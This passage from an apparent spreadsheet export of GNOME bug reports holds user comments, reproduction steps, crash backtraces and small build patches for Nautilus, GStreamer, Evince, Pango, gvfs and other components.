------- Additional Comments From reginald@mailvision.net 2001-02-13 21:28:46 ----
Additionally I have found another way to reproduce this bug.
1. Start Nautilus
2. Go to a folder ( folder1 ) that contains some music files.
3. Locate a music file ( music1 ).
4. Create a new window then quickly do the following.
5. Move the mouse pointer over music1 then click once on it. This will bring
   the first window ( window1 ) back in focus.  This is neccessary because if
   window1 is not in focus this procedure will not reproduce this bug.  As a
   matter of fact Nautilus Music Preview will not preview ( play ) music1 if
   the latter is not done.
   ** I suggest that one repeat this whole procedure a couple of times.
      Nautilus seem to slow down quite a bit after I created ten windows.  The
      probability of reproducibility seems to go up with each new window
      created. 
------- Additional Comments From tmgeorgo@io.com 2001-03-03 21:02:53 ----
I've encountered this bug *many* times and it happens to me simply by starting
nautilus switching to a folder full of MP3s in icon view and mousing over the
song until it starts playing.  The song continues playing after I move the mouse
away from the icon.  Then I can move to another MP3 icon wait the required
time and that song will start playing too without interrupting the first
song.  On the build I'm currently running (Mar3:07:32:30) I was able to have 6
songs going at the same time.  The only way to stop them is to use killall
mpg123 and this always results in zombie processes.  Immediately after killing
the 6 songs I was able to start 3 more again simultaneously (and maybe even more
if I tried but the sound was terrible! )
[tomg@gemini tomg]$ ps -ef | grep mpg
tomg      1903   661  7 21:00 ?        00:00:05 mpg123 -y -q
/home/downloads/soutomg      1910   661  7 21:01 ?        00:00:05 mpg123 -y -q
/home/downloads/soutomg      1922   661  7 21:01 ?        00:00:04 mpg123 -y -q
/home/downloads/soutomg      1923   661  7 21:01 ?        00:00:04 mpg123 -y -q
/home/downloads/soutomg      1924   661  5 21:01 ?        00:00:01 mpg123 -y -q
/home/downloads/soutomg      1925   661  7 21:01 ?        00:00:01 mpg123 -y -q
/home/downloads/soutomg      1927   925  0 21:02 pts/0    00:00:00 grep mpg
[tomg@gemini tomg]$ killall mpg123
[tomg@gemini tomg]$ ps -ef | grep mpg
tomg      1903   661  7 21:00 ?        00:00:06 [mpg123 ]
tomg      1910   661  6 21:01 ?        00:00:05 [mpg123 ]
tomg      1922   661  6 21:01 ?        00:00:04 [mpg123 ]
tomg      1923   661  6 21:01 ?        00:00:04 [mpg123 ]
tomg      1924   661  4 21:01 ?        00:00:02 [mpg123 ]
tomg      1925   661  6 21:01 ?        00:00:02 [mpg123 ]
tomg      1930   925  0 21:02 pts/0    00:00:00 grep mpg
[tomg@gemini tomg]$ ps -ef | grep mpg
tomg      1903   661  3 21:00 ?        00:00:06 [mpg123 ]
tomg      1910   661  3 21:01 ?        00:00:05 [mpg123 ]
tomg      1922   661  2 21:01 ?        00:00:04 [mpg123 ]
tomg      1923   661  2 21:01 ?        00:00:04 [mpg123 ]
tomg      1924   661  1 21:01 ?        00:00:02 [mpg123 ]
tomg      1925   661  1 21:01 ?        00:00:02 [mpg123 ]
tomg      1931   661  7 21:03 ?        00:00:04 mpg123 -y -q
/home/downloads/soutomg      1936   661  7 21:03 ?        00:00:01 mpg123 -y -q
/home/downloads/soutomg      1937   661  7 21:03 ?        00:00:01 mpg123 -y -q
/home/downloads/soutomg      1939   925  0 21:04 pts/0    00:00:00 grep mpg
In my case I have a single nautilus window open no subfolders within the folder
where this occurs and 23 MP3 files.
------- Additional Comments From gzr@eazel.com 2001-03-23 16:15:13 ----
*** Bug 47851 has been marked as a duplicate of this bug. ***
------- Additional Comments From leonchiver@altavista.com 2001-03-23 16:35:02 ----
Important: I found out that this bug appears too if Nautilus is painting my
desktop. Then you have to go to ANY forlder containing some mp3 files start
playing one sample then moving to the other file and you end up with a lot of
mpg123 instances running and a nice sound around.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:59 -------
</t>
  </si>
  <si>
    <t>reginald</t>
  </si>
  <si>
    <t>DASHER-363951</t>
  </si>
  <si>
    <t>Speech options</t>
  </si>
  <si>
    <t>Reimplement old-style speech options (all last repeat).</t>
  </si>
  <si>
    <t>GNOME-SHELL-695471</t>
  </si>
  <si>
    <t>layout overflow in application view</t>
  </si>
  <si>
    <t>Created attachment 238427
screenshot
Looks like a bug to me but feel free to close if it's not.  
gnome-ostree current master
gnome-shell git revision ef623cf</t>
  </si>
  <si>
    <t>ORCA-352238</t>
  </si>
  <si>
    <t>improved keyboard/mouse events handling</t>
  </si>
  <si>
    <t>When focusing a text box with mouse (for example: Name text box from Save As dialog from gedit) Orca throws an error: MouseButtonEvent instace has no attribute 'event_string'.</t>
  </si>
  <si>
    <t>BUG-BUDDY-318281</t>
  </si>
  <si>
    <t>bug-buddy should get default email addresses and name from gnome-about-me</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/show_bug.cgi?id=17193
Bug-buddy should get the default list of email addresses and the name from the
data entered with gnome-about-me.</t>
  </si>
  <si>
    <t>LIBEGG-162122</t>
  </si>
  <si>
    <t>text_handler not safe for GMarkupParser</t>
  </si>
  <si>
    <t>The documentation for GMarkupParser::text says text is not nul-terminated
The 'text_handler' implementation assumes it is.</t>
  </si>
  <si>
    <t>GNOME-UTILS-32813</t>
  </si>
  <si>
    <t>gw</t>
  </si>
  <si>
    <t>gw: Commands 'write 'Ytalk' and 'talk' do nothing.</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  Gw (User Listing)
Severity: grave
Version:  1.2.1
Synopsis: Commands 'write' Ytalk' &amp; 'talk' do not function after being added.
Class:    sw-bug
System: SunOS 5.8 sun4u sparc
C compiler: /usr/ucb/cc:  language optional software package not installed
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.3
libxml: 1.8.7
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
The commands 'write' 'talk' &amp; 'Ytalk' can be added to 'User Listing'
via the
Preferences dialog but these commands do not perform any function after
being added.
------- Additional Comments From shane.oconnor@ireland.sun.com 2001-01-22 05:52:14 ----
Subject: Please Ignore - This is just a test
From: Shane O'Connor 
To: 32813@bugs.gnome.org
Cc: shane.oconnor@ireland.sun.com
Message-Id: 
Date: Mon 22 Jan 2001 10:52:14 GMT
Package:  general
Severity: normal
Version:  
Synopsis: Please Ignore - This is just a test
Class:    sw-bug
System: SunOS 5.8 sun4u sparc
C compiler: /usr/ucb/cc:  language optional software package not installed
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.26
gnome-core: gnome-core 1.2.4
Description:
Please ignore - This is just a test
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 12:01 -------
This bug was previously known as bug 32813 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=32813
Originally filed under the gnome-utils product and general component.
Unknown version 1.2.x in product gnome-utils. Setting version to the default unspecified.
The original reporter (shane.oconnor@ireland.sun.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-utils-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNOME-SHELL-653067</t>
  </si>
  <si>
    <t>Add tooltips in overview for file search results (to show full path)</t>
  </si>
  <si>
    <t>Created attachment 190332
cannot distinguish among files with the same name
IIRC there is already opposition to tooltips for applications.
Nevertheless I would like to see them for the file search results (aka recently-used in 3.0). I work frequently on documents with the same filename - and without showing additional information it is impossible to distinguish them.
See attachment</t>
  </si>
  <si>
    <t>GNOME-APPLETS-52277</t>
  </si>
  <si>
    <t>IRIX support</t>
  </si>
  <si>
    <t>Here're some changes to add IRIX support to the cdplayer applet (I'll add
cdrom-irix.c as an attachment):
--- ./config.h.in	Tue Oct 17 14:30:25 2000
+++ ../gnome-applets-1.2.4/./config.h.in	Thu Mar 15 18:58:32 2001
@@ -1596 +1599 @@
 /* Define if you have the  header file.  */
 #undef HAVE_SYS_AUDIOIO_H
+/* Define if you have the  header file.  */
+#undef HAVE_DMEDIA_AUDIO_H
+
 /* Define if you have the  header file.  */
 #undef HAVE_SYS_BITYPES_H
--- ./configure.in	Wed Nov 15 15:04:16 2000
+++ ../gnome-applets-1.2.4/./configure.in	Thu Mar 15 18:37:55 2001
@@ -857 +857 @@
 dnl cdplayer
 AC_CANONICAL_HOST
 case $host in
-*irix*) CDROM_HOST=iric CDROM_LIBS=-lcdaudio -lmediad -lds
+*irix*) CDROM_HOST=${FORCE_CDROM_HOST-irix} CDROM_LIBS=-lcdaudio
-lmediad -lds
 *linux*) CDROM_HOST=linux
 *solaris*) CDROM_HOST=solaris
 esac
@@ -1047 +1048 @@
     AC_CHECK_HEADERS(sys/soundcard.h [P_MIXER=mixer][
       AC_CHECK_HEADERS(sys/audioio.h [P_MIXER=mixer][
         AC_CHECK_HEADERS(sys/audio.io.h [P_MIXER=mixer][
-          AC_CHECK_HEADERS(sun/audioio.h [P_MIXER=mixer]) ]) ]) ]) ]) ])
+          AC_CHECK_HEADERS(sun/audioio.h [P_MIXER=mixer][
+	    AC_CHECK_HEADERS(dmedia/audio.h [P_MIXER=mixer]) ]) ]) ]) ]) ]) ])
 AM_CONDITIONAL(APPLET_MIXER test $P_MIXER = mixer)
 if test $P_MIXER != mixer then</t>
  </si>
  <si>
    <t>ATK-128799</t>
  </si>
  <si>
    <t>nautilus list view has role of UNKNOWN</t>
  </si>
  <si>
    <t>When poking nautilus with at-poke I noticed that the accessible object
correspinding to the list view has role of UNKNOWN.</t>
  </si>
  <si>
    <t>EVOLUTION-257122</t>
  </si>
  <si>
    <t>timezone selector ...</t>
  </si>
  <si>
    <t>When selecting a timezone I could have sworn there was feedback as to the
zone - as you mouse-over'd it - so I could find 'America/Boise' easily -
despite a tenuous grasp of western US geography.
Now it seems you have to click - which makes it less usable (for me) - or
perhaps I remember wrong (?)</t>
  </si>
  <si>
    <t>VTE-132610</t>
  </si>
  <si>
    <t>contents-changed signal not useful due to a typo</t>
  </si>
  <si>
    <t>There is a typo in vte.c corrected by the following patch which renders
the contents-changed signal not very useful and blocks bug 132173 for
example.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-394003</t>
  </si>
  <si>
    <t>Polypaudio is renamed to PulseAudio</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #349305 +++
Please describe the problem:
GStreamer-Properties is probing for polypsink/polypsrc elements. These are no longer available. pulsesink and pulsesrc are the new names of these elements. 
capplets/sound/sound-properties-capplet.c uses these as well.</t>
  </si>
  <si>
    <t>GTK+-740346</t>
  </si>
  <si>
    <t>Mir backend needs support for GdkGLContext</t>
  </si>
  <si>
    <t>Preliminary work is pushed in wip/mir-gdkgl branch it mostly works [0] but at least here (using radeon) I'm getting some texture corruptions when enabling egl_swap_buffers_with_damage (and thus using eglSwapBuffersWithDamageEXT instead of eglSwapBuffers) as you can see at [2] or [3].
Not sure whether this is a mir or gdk issue yet (by the way having damage swapping would improve performances but it's not fundamental to have this working).
[0] https://www.youtube.com/watch?v=xQyfvEvQ_G0
[1] https://git.gnome.org/browse/gtk+/log/?h=wip/mir-gdkgl
[2] http://people.ubuntu.com/~3v1n0/gdkgl-mir-bad1.avi
[3] http://people.ubuntu.com/~3v1n0/gdkgl-mir-bad2.avi</t>
  </si>
  <si>
    <t>GIMP-144361</t>
  </si>
  <si>
    <t>crop tool keep aspect ratio doesn't always work</t>
  </si>
  <si>
    <t>This works:
  1) load an image (there is no selection)
  2) select crop tool
  3) drag one corner all the way to the upper left
  4) drag the other corner all the way to the bottom right
  5) hold down shift and drag one corner
  6) ratio is preserved
This does not work:
  1) load an image (there is no selection)
  2) select crop tool
  3) click in the image anywhere
  4) click the from selection button
  5) the crop box is now at the edges of the image
  6) hold down shift and drag one corner
  7) ratio is NOT preserved despite the fact that while shift is held
     down the keep aspect ratio checkbox in the crop dialog is checked.
So apparently something funny is happening when you do from selection.
I tried to do it that way because from selection is a faster way to get a crop
rectangle that is the size of the image (since what I'm trying to do is crop an
image but preserve the aspect ratio of the original image -- not the aspect
ratio of whatever random rectangle happened to be the first one I dragged out.)
This is Gimp 2.1.0.</t>
  </si>
  <si>
    <t>GSTREAMER-333416</t>
  </si>
  <si>
    <t>Small 0.10 fixes for the PWG</t>
  </si>
  <si>
    <t>Documentation 
Section: 
See attached patch
Correct version:
Other information:</t>
  </si>
  <si>
    <t>GNOME-PILOT-311072</t>
  </si>
  <si>
    <t>conduit system</t>
  </si>
  <si>
    <t>Patch to fix crashes in expense conduit</t>
  </si>
  <si>
    <t>Version details: gnome-pilot-conduits-2.0.13-1
Distribution/Version: Fedora Core 4
While working on getting gnome-pilot-conduits in FC4 updated to work with the
shipped pilot-link (see bug #274032) I ran into a crash in the expense conduit.
It turns out that there are two bugs here.
1) the check for the directory being set isn't sufficient as the dialog box
sets an empty string but we only check for NULL
2) if an error occurs (such as while calling mkdir) we try to close the array
of opened file descriptors... except they've not yet been opened or even initialized
The attached patch fixes both of those bugs. A changelog entry is also attached.</t>
  </si>
  <si>
    <t>adams.mark.g</t>
  </si>
  <si>
    <t>GTK+-56989</t>
  </si>
  <si>
    <t>gtk_widget_modify_style() not working?</t>
  </si>
  <si>
    <t>The color selector test in gtk-demo appears to be broken I would guess
it was the recent changes to the RC style code. (The drawing area you
change the color of does not get its color modified.)</t>
  </si>
  <si>
    <t>GSTREAMER-102025</t>
  </si>
  <si>
    <t>[Patch] Crash on exit/stop if sound was already in use</t>
  </si>
  <si>
    <t>Its primarily with rhythmbox-0.4.1.  If the sound device (OSS) was in use
before rhythmbox are started and you either:
 1) start to play a song and then pause it
 2) exit
gstreamer segfault.
gdb output of crash:
----------------------------------------
# gdb /usr/bin/rhythmbox 
GNU gdb 5.3
Copyright 2002 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as i686-pc-linux-gnu...
(gdb) run
Starting program: /usr/bin/rhythmbox 
[New Thread 16384 (LWP 4438)]
INFO ( 4438: 0) Initializing GStreamer Core Library version 0.5.0 
INFO ( 4438: 0) CPU features: (00000000) MMX SSE 
registry: loaded user_registry in 0.000195 seconds
          (/root/.gstreamer/registry.xml)
registry: loaded global_registry in 0.097420 seconds
          (/var/lib/cache/gstreamer-0.5/registry.xml)
building level
building level
building level
building level
building level
building level
building level
building level
building level
building level
building level
building level
building level
building level
building level
[New Thread 32769 (LWP 4447)]
[New Thread 16386 (LWP 4448)]
[New Thread 32771 (LWP 4449)]
building level
building level
[New Thread 49156 (LWP 4450)]
[New Thread 65541 (LWP 4451)]
** (rhythmbox:4451): WARNING **: osscommon: unable to open the sound device
(in use ?)
Program received signal SIGINT Interrupt.
[Switching to Thread 65541 (LWP 4451)]
0x4202d561 in kill () from /lib/libc.so.6
(gdb) bt
#0  0x4202d561 in kill () from /lib/libc.so.6
#1  0x4227aaed in pthread_kill () from /lib/libpthread.so.0
#2  0x4227ae0b in raise () from /lib/libpthread.so.0
#3  0x08063677 in rb_debug_stop_in_debugger () at rb-debug.c:137
#4  0x080636d1 in log_handler (domain=0x0 level=G_LOG_LEVEL_WARNING
message=0x4098844c osscommon: unable to open the sound device (in use ?)\n 
    data=0x0) at rb-debug.c:154
#5  0x4253a447 in g_logv () from /usr/lib/libglib-2.0.so.0
#6  0x4253a624 in g_log () from /usr/lib/libglib-2.0.so.0
#7  0x4017be6d in gst_osscommon_open_audio () from
/usr/lib/gstreamer-0.5/libgstossaudio.so
#8  0x40177d82 in gst_osssink_change_state () from
/usr/lib/gstreamer-0.5/libgstossaudio.so
#9  0x400691ff in gst_element_set_state (element=0x82d6580
state=GST_STATE_READY) at gstelement.c:1938
#10 0x40058d8e in gst_bin_change_state (element=0x82cad00) at gstbin.c:582
#11 0x4008a506 in gst_thread_main_loop (arg=0x82cad00) at gstthread.c:592
#12 0x42549fb7 in g_thread_create_proxy () from /usr/lib/libglib-2.0.so.0
#13 0x42278120 in pthread_start_thread () from /lib/libpthread.so.0
#14 0x42278222 in pthread_start_thread_event () from /lib/libpthread.so.0
(gdb)</t>
  </si>
  <si>
    <t>11285613</t>
  </si>
  <si>
    <t>GEDIT-106129</t>
  </si>
  <si>
    <t>Package should use the AM_GCONF_SOURCE_2 macro</t>
  </si>
  <si>
    <t>The configure.in script of gedit should use the AM_GCONF_SOURCE_2 macro instead of hardcoding stuff for gconf2 configuration. This macro provides an abstraction for GConf2 user tunnable settings and provides most of them automatically.
The package should be modified to take care of them (optional registering of gconf schemas and install location of them).</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-26689</t>
  </si>
  <si>
    <t>gnome background config error</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  general
Severity: normal
Version:  1.0.53
Synopsis: gnome background config error
Class:    sw-bug
System: Linux 2.2.15-4mdk i686 unknown
C library: glibc-2.1.3-5mdk
C compiler: 2.95.3
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.0.58
gnome-print: gnome-print-0.18-2mdk
gnome-core: gnome-core 1.1.9
Description:
after right-button click on desktop to select configure background
image:
receive this note
Application /usr/bin/background-properties-capplet (process 9208) has
crashed due to a fatal error.
(Segmentation fault)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0x40587d49 in wait4 () from /lib/libc.so.6
#0  0x40587d49 in wait4 () from /lib/libc.so.6
#1  0x405e8800 in ?? () from /lib/libc.so.6
#2  0x4016a0a9 in gnome_init_with_popt_table () from
/usr/lib/libgnomeui.so.32
#3  0x40136674 in gnome_cloned_client () from /usr/lib/libgnomeui.so.32
#4  0x110d4c in ?? ()
#5  0x809ed98 in ?? ()
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:40 -------
This bug was previously known as bug 26689 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=26689
Originally filed under the control-center product and general component.
Unknown version 1.0.x in product control-center. Setting version to the default unspecified.
The original reporter (jrsb@geology.wisc.edu) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component bugmeister@canvas.gnome.org.
</t>
  </si>
  <si>
    <t>jrsb</t>
  </si>
  <si>
    <t>EVINCE-336825</t>
  </si>
  <si>
    <t>evince crashes on window close/application exit</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. start evince
2. (do some work and then) exit evince
3. 
Stack trace:
(gdb) r
Starting program: /usr/bin/evince
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 29601)]
[New Thread 32769 (LWP 29604)]
[New Thread 16386 (LWP 29605)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 16384 (LWP 29601)]
0xb7418f39 in IA__gtk_tree_model_get_iter (tree_model=0x0 iter=0xbff29390
path=0x0) at gtktreemodel.c:927
927       iface = GTK_TREE_MODEL_GET_IFACE (tree_model)
(gdb) where
#0  0xb7418f39 in IA__gtk_tree_model_get_iter (tree_model=0x0 iter=0xbff29390
path=0x0) at gtktreemodel.c:927
#1  0xb7419a0c in IA__gtk_tree_model_foreach (model=0x0 func=0x8113628
user_data=0x8113628) at gtktreemodel.c:1555
#2  0x0807f04a in ev_sidebar_thumbnails_new ()
#3  0x0807f543 in ev_sidebar_thumbnails_refresh ()
#4  0xb6ca84ab in g_object_unref () from /usr/lib/libgobject-2.0.so.0
#5  0xb6ca9c12 in g_object_run_dispose () from /usr/lib/libgobject-2.0.so.0
#6  0xb7387198 in IA__gtk_object_destroy (object=0x8113628) at gtkobject.c:403
#7  0xb7449cd1 in IA__gtk_widget_destroy (widget=0x8113628) at gtkwidget.c:2039
#8  0xb737ebd8 in gtk_notebook_forall (container=0x8113628 include_internals=0
callback=0xb7449cc0  callback_data=0x0) at
gtknotebook.c:3541
#9  0xb72ee014 in IA__gtk_container_foreach (container=0x1 callback=0x8113628
callback_data=0x8113628) at gtkcontainer.c:1288
#10 0xb72ef7fe in gtk_container_destroy (object=0x818a000) at gtkcontainer.c:825
#11 0xb7385a91 in gtk_notebook_destroy (object=0x818a000) at gtknotebook.c:1287
#12 0xb6cb6f85 in g_cclosure_marshal_VOID__VOID () from /usr/lib/libgobject-2.0.so.0
#13 0xb6ca56b9 in g_type_class_meta_marshal () from /usr/lib/libgobject-2.0.so.0
#14 0xb6ca546b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#15 0xb6cb5bcf in signal_emit_unlocked_R () from /usr/lib/libgobject-2.0.so.0
#16 0x00000000 in ?? ()
(gdb) quit
Other information:
% evince --version
Gnome evince 0.5.2
% ldd /usr/bin/evince
        linux-gate.so.1 =&gt;  (0xffffe000)
        libgcc_s.so.1 =&gt; /usr/lib/libgcc_s.so.1 (0xb7f11000)
        libgnomeui-2.so.0 =&gt; /usr/lib/libgnomeui-2.so.0 (0xb7e84000)
        libbonoboui-2.so.0 =&gt; /usr/lib/libbonoboui-2.so.0 (0xb7e25000)
        libhowl.so.0 =&gt; /usr/lib/libhowl.so.0 (0xb7e19000)
        libSM.so.6 =&gt; /usr/X11/lib/libSM.so.6 (0xb7e10000)
        libICE.so.6 =&gt; /usr/X11/lib/libICE.so.6 (0xb7df8000)
        libgnome-2.so.0 =&gt; /usr/lib/libgnome-2.so.0 (0xb7de4000)
        libesd.so.0 =&gt; /usr/lib/libesd.so.0 (0xb7dd9000)
        libasound.so.2 =&gt; /usr/lib/libasound.so.2 (0xb7d1d000)
        libaudiofile.so.0 =&gt; /usr/lib/libaudiofile.so.0 (0xb7cf8000)
        libgnomevfs-2.so.0 =&gt; /usr/lib/libgnomevfs-2.so.0 (0xb7c99000)
        libssl.so.0.9.8 =&gt; /usr/lib/libssl.so.0.9.8 (0xb7c5b000)
        libcrypto.so.0.9.8 =&gt; /usr/lib/libcrypto.so.0.9.8 (0xb7b22000)
        libavahi-glib.so.1 =&gt; /usr/lib/libavahi-glib.so.1 (0xb7b1e000)
        libavahi-client.so.3 =&gt; /usr/lib/libavahi-client.so.3 (0xb7b0f000)
        libavahi-common.so.3 =&gt; /usr/lib/libavahi-common.so.3 (0xb7b04000)
        libresolv.so.2 =&gt; /lib/libresolv.so.2 (0xb7af2000)
        libutil.so.1 =&gt; /lib/libutil.so.1 (0xb7aee000)
        librt.so.1 =&gt; /lib/librt.so.1 (0xb7ada000)
        libbonobo-2.so.0 =&gt; /usr/lib/libbonobo-2.so.0 (0xb7a7f000)
        libbonobo-activation.so.4 =&gt; /usr/lib/libbonobo-activation.so.4 (0xb7a6b000)
        libORBitCosNaming-2.so.0 =&gt; /usr/lib/libORBitCosNaming-2.so.0 (0xb7a67000)
        libglade-2.0.so.0 =&gt; /usr/lib/libglade-2.0.so.0 (0xb7a50000)
        libgconf-2.so.4 =&gt; /usr/lib/libgconf-2.so.4 (0xb7a26000)
        libORBit-2.so.0 =&gt; /usr/lib/libORBit-2.so.0 (0xb79d6000)
        libpopt.so.0 =&gt; /usr/lib/libpopt.so.0 (0xb79ce000)
        libgthread-2.0.so.0 =&gt; /usr/lib/libgthread-2.0.so.0 (0xb79ca000)
        libpthread.so.0 =&gt; /lib/libpthread.so.0 (0xb7976000)
        libpoppler-glib.so.1 =&gt; /usr/lib/libpoppler-glib.so.1 (0xb795d000)
        libpoppler.so.1 =&gt; /usr/lib/libpoppler.so.1 (0xb77f1000)
        libgnome-keyring.so.0 =&gt; /usr/lib/libgnome-keyring.so.0 (0xb77e6000)
        libdbus-glib-1.so.2 =&gt; /usr/lib/libdbus-glib-1.so.2 (0xb77ca000)
        libdbus-1.so.2 =&gt; /usr/lib/libdbus-1.so.2 (0xb779b000)
        libnsl.so.1 =&gt; /lib/libnsl.so.1 (0xb7786000)
        libtiff.so.3 =&gt; /usr/lib/libtiff.so.3 (0xb7733000)
        libjpeg.so.62 =&gt; /usr/lib/libjpeg.so.62 (0xb7714000)
        libc.so.6 =&gt; /lib/libc.so.6 (0xb75f4000)
        libgnomeprintui-2-2.so.0 =&gt; /usr/lib/libgnomeprintui-2-2.so.0 (0xb75ba000)
        libgnomeprint-2-2.so.0 =&gt; /usr/lib/libgnomeprint-2-2.so.0 (0xb7555000)
        libgnomecanvas-2.so.0 =&gt; /usr/lib/libgnomecanvas-2.so.0 (0xb752b000)
        libart_lgpl_2.so.2 =&gt; /usr/lib/libart_lgpl_2.so.2 (0xb7515000)
        libgtk-x11-2.0.so.0 =&gt; /usr/lib/libgtk-x11-2.0.so.0 (0xb7279000)
        libgdk-x11-2.0.so.0 =&gt; /usr/lib/libgdk-x11-2.0.so.0 (0xb720b000)
        libatk-1.0.so.0 =&gt; /usr/lib/libatk-1.0.so.0 (0xb71f0000)
        libgdk_pixbuf-2.0.so.0 =&gt; /usr/lib/libgdk_pixbuf-2.0.so.0 (0xb71de000)
        libpangocairo-1.0.so.0 =&gt; /usr/lib/libpangocairo-1.0.so.0 (0xb71d7000)
        libpangoft2-1.0.so.0 =&gt; /usr/lib/libpangoft2-1.0.so.0 (0xb71ad000)
        libpango-1.0.so.0 =&gt; /usr/lib/libpango-1.0.so.0 (0xb717a000)
        libm.so.6 =&gt; /lib/libm.so.6 (0xb7157000)
        libcairo.so.2 =&gt; /usr/lib/libcairo.so.2 (0xb70fd000)
        libXrender.so.1 =&gt; /usr/X11/lib/libXrender.so.1 (0xb70f4000)
        libX11.so.6 =&gt; /usr/X11/lib/libX11.so.6 (0xb7003000)
        libXext.so.6 =&gt; /usr/X11/lib/libXext.so.6 (0xb6ff5000)
        libpng12.so.0 =&gt; /usr/lib/libpng12.so.0 (0xb6fbc000)
        libglitz.so.1 =&gt; /usr/lib/libglitz.so.1 (0xb6f93000)
        libfontconfig.so.1 =&gt; /usr/lib/libfontconfig.so.1 (0xb6f63000)
        libexpat.so.1 =&gt; /usr/lib/libexpat.so.1 (0xb6f43000)
        libfreetype.so.6 =&gt; /usr/lib/libfreetype.so.6 (0xb6ede000)
        libxml2.so.2 =&gt; /usr/lib/libxml2.so.2 (0xb6dc5000)
        libz.so.1 =&gt; /usr/lib/libz.so.1 (0xb6db2000)
        libstdc++.so.6 =&gt; /usr/lib/libstdc++.so.6 (0xb6ce5000)
        libgobject-2.0.so.0 =&gt; /usr/lib/libgobject-2.0.so.0 (0xb6cb7000)
        libgmodule-2.0.so.0 =&gt; /usr/lib/libgmodule-2.0.so.0 (0xb6cb4000)
        libdl.so.2 =&gt; /lib/libdl.so.2 (0xb6cb0000)
        libglib-2.0.so.0 =&gt; /usr/lib/libglib-2.0.so.0 (0xb6c37000)
        /lib/ld-linux.so.2 (0xb7f31000)
        libXinerama.so.1 =&gt; /usr/X11/lib/libXinerama.so.1 (0xb6c33000)
        libXrandr.so.2 =&gt; /usr/X11/lib/libXrandr.so.2 (0xb6c2f000)
        libXcursor.so.1 =&gt; /usr/X11/lib/libXcursor.so.1 (0xb6c26000)
        libXfixes.so.3 =&gt; /usr/X11/lib/libXfixes.so.3 (0xb6c20000)
        libXau.so.6 =&gt; /usr/X11/lib/libXau.so.6 (0xb6c1d000)
        libXdmcp.so.6 =&gt; /usr/X11/lib/libXdmcp.so.6 (0xb6c18000)
laptop ~%</t>
  </si>
  <si>
    <t>LIBZVT-85270</t>
  </si>
  <si>
    <t>Crash when inspecting gnome-terminal with at-poke</t>
  </si>
  <si>
    <t>Steps to reproduce the crash:
- open gnome-terminal and at-poke
- select gnome-terminal in at-poke and expand like this: gnome-
terminal/frame/page-tab list/page tab/filler/terminal
- click on terminal (would normally get you more info in the right pane). 
You will get a crash in gnome_terminal first then in at-poke.
The Gnome2 stack we are using is from 31 May 2002.</t>
  </si>
  <si>
    <t>PANGO-337029</t>
  </si>
  <si>
    <t>pango/fonts.c: Illegal structure initialization</t>
  </si>
  <si>
    <t>Please describe the problem:
str[16] in the structure FieldMap is arrary it's not pointer.
But str[16] is initialized by NULL at style_map variant_map weight_map and
stretch_map.
NULL is defined as pointer.
Steps to reproduce:
1. compile by Visual C++
Actual results:
following messages are displayed.
fonts.c(760) : error C4047: 'initializing' : 'const char' differs in levels of
indirection from 'void *'
fonts.c(766) : error C4047: 'initializing' : 'const char' differs in levels of
indirection from 'void *'
fonts.c(773) : error C4047: 'initializing' : 'const char' differs in levels of
indirection from 'void *'
fonts.c(786) : error C4047: 'initializing' : 'const char' differs in levels of
indirection from 'void *'
Expected results:
Use zero length string instead of NULL. For exsample
static const FieldMap style_map[] = {
  { PANGO_STYLE_NORMAL  }
  { PANGO_STYLE_OBLIQUE Oblique }
  { PANGO_STYLE_ITALIC Italic }
}
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GVFS-520085</t>
  </si>
  <si>
    <t>dns-sd backend</t>
  </si>
  <si>
    <t>doesn't list sftp-ssh</t>
  </si>
  <si>
    <t>baptiste@laptop:~$ avahi-browse -a
[...]
+ eth2 IPv6 SFTP File Transfer on centos5-vm              SFTP File Transfer   local
+ eth2 IPv4 SFTP File Transfer on centos5-vm              SFTP File Transfer   local
[...]
= eth2 IPv6 SFTP File Transfer on centos5-vm              SFTP File Transfer   local
   hostname = [centos5-vm.local]
   address = [fe80::20c:29ff:fe8e:5b4b]
   port = [22]
   txt = [org.freedesktop.Avahi.cookie=920828400]
= eth2 IPv4 SFTP File Transfer on centos5-vm              SFTP File Transfer   local
   hostname = [centos5-vm.local]
   address = [10.31.2.48]
   port = [22]
   txt = [org.freedesktop.Avahi.cookie=920828400]
if I do a gvfs-ls dns-sd://local nothing is returned (I can't do a gvfs dns-sd://local -a it is broken ATM)</t>
  </si>
  <si>
    <t>GLIB-674452</t>
  </si>
  <si>
    <t>SEGFAULT in gio contenttype test</t>
  </si>
  <si>
    <t>Downstream bug report: https://bugs.gentoo.org/show_bug.cgi?id=411907
Running the tests for glib 2.32.1 I'm getting this test failure:
TEST: contenttype... (pid=13562)
  /contenttype/guess:                                                  FAIL
GTester: last random seed: R02Sbad8975595b540f5fe12259dfda1ca07
